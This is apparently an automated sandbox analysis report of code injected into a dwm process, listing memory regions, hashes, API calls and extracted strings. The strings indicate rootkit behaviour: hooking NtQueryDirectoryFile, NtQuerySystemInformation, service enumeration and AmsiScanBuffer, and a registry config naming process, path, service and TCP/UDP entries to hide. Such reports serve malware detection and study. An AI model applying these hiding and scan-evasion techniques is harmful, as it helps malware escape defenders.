                                            • Opcode ID: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                            • Instruction ID: b306ee0a4e48fbe2017bb3906ee44052a6ce1d131a3da1e4b3903ba443df59dd
                                            • Opcode Fuzzy Hash: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                            • Instruction Fuzzy Hash: 07029A32119B94C6E760CB55F49835ABBB0F385794F904126EA8E87FA8DB7EC458CF01

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: 41ad1d7497232c222a08116fe1182cf171a95b5ef2bd5ba6334f81b7dc962d0b
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 26112E36605B50D3EB258B61E41C31A67B0FB45B80F844036DA9D03BD8EB7EC958C785
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000003.1574397237.00000262F20A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F20A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_3_262f20a0000_dwm.jbxd
                                            Similarity
                                            • API ID: Virtual$Protect$AllocLibraryLoad
                                            • String ID:
                                            • API String ID: 3316853933-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: 3bfd93b4f68ccc403cd171713a284d1eaae66b2d477bb8876fa4c4d11fad0ae8
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: FF916973B02A50C7DB508F65D4A8B7DB3A1F725B98F8480299F4907F88DA3ED806CB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd
                                            Similarity
                                            • API ID: Virtual$Protect$Alloc
                                            • String ID:
                                            • API String ID: 2541858876-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: 2b53b104534d931d9bbca92df6b7dd39c888927d9edc43f557f94db6afda7e75
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: B991F673B11A60DBDB648F29D40CB6DB3B1F794B98F9486249E4947F88DA3AD816C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000003.1733412795.00000262F1CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1CD0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_3_262f1cd0000_dwm.jbxd
                                            Similarity
                                            • API ID: Virtual$Protect$Alloc
                                            • String ID:
                                            • API String ID: 2541858876-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: 59ea7243bf80c569789660e50a8d2276252486441d4de17b73a98efa3b3f7c3a
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: 4A9115B2B01961C7DB548F29D40C76DB3B1F744B94F989134DE6A07BC8DA3AE816C701

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocQuery
                                            • String ID:
                                            • API String ID: 31662377-0
                                            • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                            • Instruction ID: c30f952ed72ae9ce0ef1c6df801ded334056910f438beab0216d37857a881daa
                                            • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                            • Instruction Fuzzy Hash: 53313C32219E90C1EA34DA55E56C35A6AB4F398788FD00535A5CE46FECDF2EC198CB05

                                            Control-flow Graph

                                            APIs
                                            • GetModuleFileNameW.KERNEL32 ref: 00000262F1C93A35
                                            • PathFindFileNameW.SHLWAPI ref: 00000262F1C93A44
                                              • Part of subcall function 00000262F1C93F88: StrCmpNIW.SHLWAPI(?,?,?,00000262F1C9272F), ref: 00000262F1C93FA0
                                              • Part of subcall function 00000262F1C93EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93EDB
                                              • Part of subcall function 00000262F1C93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F0E
                                              • Part of subcall function 00000262F1C93EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F2E
                                              • Part of subcall function 00000262F1C93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F47
                                              • Part of subcall function 00000262F1C93EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F68
                                            • CreateThread.KERNELBASE ref: 00000262F1C93A8B
                                              • Part of subcall function 00000262F1C91E74: GetCurrentThread.KERNEL32 ref: 00000262F1C91E7F
                                              • Part of subcall function 00000262F1C91E74: CreateThread.KERNELBASE ref: 00000262F1C92043
                                              • Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C92049
                                              • Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C92055
                                              • Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C92061
                                              • Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C9206D
                                              • Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C92079
                                              • Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C92085
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                            • String ID:
                                            • API String ID: 2779030803-0
                                            • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction ID: f08a503081193f604c2ddc071613d9d594e76e292e5a47b07e0559d39bf49dfb
                                            • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction Fuzzy Hash: 79115E35A10E21D2FB60D7B0A56E3AD2AB1A794745FD06139D406C1DD8EF7FC44C8603

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                            • String ID:
                                            • API String ID: 3733156554-0
                                            • Opcode ID: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                            • Instruction ID: 537c6a276b95caa958d245740a431bfac0611e9d085785c801071f61a06aa8be
                                            • Opcode Fuzzy Hash: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                            • Instruction Fuzzy Hash: 47F01D36219F54C0D630EB06E46934A6BB0E388BD4FD44126FA8D47FADCA3AC1948F01

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00000262F1C91724: GetProcessHeap.KERNEL32 ref: 00000262F1C9172F
                                              • Part of subcall function 00000262F1C91724: HeapAlloc.KERNEL32 ref: 00000262F1C9173E
                                              • Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C917AE
                                              • Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C917DB
                                              • Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C917F5
                                              • Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C91815
                                              • Part of subcall function 00000262F1C91724: RegCloseKey.KERNELBASE ref: 00000262F1C91830
                                              • Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C91850
                                              • Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C9186B
                                              • Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C9188B
                                              • Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C918A6
                                              • Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C918C6
                                            • SleepEx.KERNELBASE ref: 00000262F1C91BDF
                                              • Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C918E1
                                              • Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C91901
                                              • Part of subcall function 00000262F1C91724: RegCloseKey.KERNELBASE ref: 00000262F1C9191C
                                              • Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C9193C
                                              • Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C91957
                                              • Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C91977
                                              • Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C91992
                                              • Part of subcall function 00000262F1C91724: RegCloseKey.KERNELBASE ref: 00000262F1C9199C
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: CloseOpen$Heap$AllocProcessSleep
                                            • String ID:
                                            • API String ID: 948135145-0
                                            • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction ID: fd343f7cf99c865c08f47d7ccd667bc84813d034eeded73e21c5b272cb38adfc
                                            • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction Fuzzy Hash: FB315375300EA1C1FB50AB22D56F3692BB4AB44FE0FD444318E0A87FDDDE22C8588206

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 410 262f1dff370-262f1dff39f VirtualProtect
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction ID: f23463afe30cdc17a2e76276f20813f05f00e00668a0f628b690fd7606ce3643
                                            • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction Fuzzy Hash: 02D0C935731950C3F304DB12D84DB996229F798701FC04005E94992E948B7DC659CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 408 262f1c9f370-262f1c9f39f VirtualProtect
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction ID: a6e42f25db23f464169777f547cbd8ceca01b5f8319139163ff204378ead1c20
                                            • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction Fuzzy Hash: CAD0C935731950C3E300DB12E8597956238B398701FC04015E94982AD48B7DC259CB51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 409 262f1d0f370-262f1d0f39f VirtualProtect
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2913474846.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                            • Associated: 0000000E.00000002.2913343111.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913545116.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913674660.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913740653.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913862883.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1d00000_dwm.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction ID: f00f757df4a10957ec3c18d2ce7bea6e40a0d13cbce99772594dd902569dc966
                                            • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction Fuzzy Hash: D7D0C9357319A0C3F304DB52D849B956278B398701FC04005E94992A948B7DC259CB50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: 57599514ed50b3f3357626f1b51100533c9f7f657b899454d2d60de95ffba1c5
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: A3B1A076210EA0D6EB68CF25D44C7A9A3B4FB44B84F865016EE095BF94DF36CE88C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: e158f18a4a49a17a15c2cf63f04459bfebf86e106df253f99b8879fa09bcff83
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: D8413B36214F90C6EB60CF25E8487AE73B4F788B94F900115EA9D46F98DF79C659CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: 42559198cc66a15e14dc1f9fd4373957180e0d495b1dc37fe42f463dc7ed39d2
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 9EA11932704FA1C9FB20DB75E88C3AD7BB0E745B94F944115DE9827E99CA3AC649C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3572789727
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: a9b5302b5a6786ec33f6dff008b82699113264866064c775d899668cacc6ee70
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: 8671C536210E61C6EB10DF66E89C69D23B9FB88F88F806111DE4E57E68DF2AC548C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: cd14397ea3517162f67ad098ebbb7c54800d29f6851da51f7990866f87dd0097
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 365178B4150E6AE5FB08EFA4EC8D7D42770AB44B84FC04517D80927E65EE7AC29EC780
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 0d62dbb96ea055a6f24c159b609ce0e23f978236a57ad969449243903de67d4c
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: 4C510832614F94DAE764CF62E84C36AB7B5F788F98F844124DE4947B58EF39C1498B00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
